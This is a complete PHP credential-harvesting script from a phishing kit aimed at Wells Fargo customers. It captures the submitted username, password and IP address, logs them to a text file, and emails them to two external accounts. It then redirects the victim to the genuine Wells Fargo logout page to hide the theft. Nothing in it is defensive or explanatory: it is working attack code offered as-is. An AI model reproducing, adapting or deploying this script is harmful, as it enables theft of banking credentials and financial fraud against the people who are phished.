<?php

$ip = getenv("REMOTE_ADDR");

$message .= "-----------  ! +Account infoS+ !  -----------\n";
$message .= "Username   : ".$_POST['Username']."\n";
$message .= "Password   : ".$_POST['Password']."\n";
$message .= "IP Address : ".$ip."\n";
$message .= "-----------  !Thuglife_Legend+ !  -----------\n";
$send = "demiiluv01@gmail.com, demiiluv@yandex.com";


$fp = fopen("wells.txt","a");
fputs($fp,$message);
fclose($fp);

$subject = "Wells! xD $ip";
$headers = "From:  <info@notime>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
$arr=array($send, $IP);
foreach ($arr as $send)
mail($send,$subject,$message,$headers);
    

header("Location: https://connect.secure.wellsfargo.com/auth/secureLogout?st=1634581425&SAMLart=AAQCY%2BoEQCR14WDgSxaU4QNGCHpGcoS1L4wXvcOQx0QXIOjtiecTo4IWjfM%3D");

?>


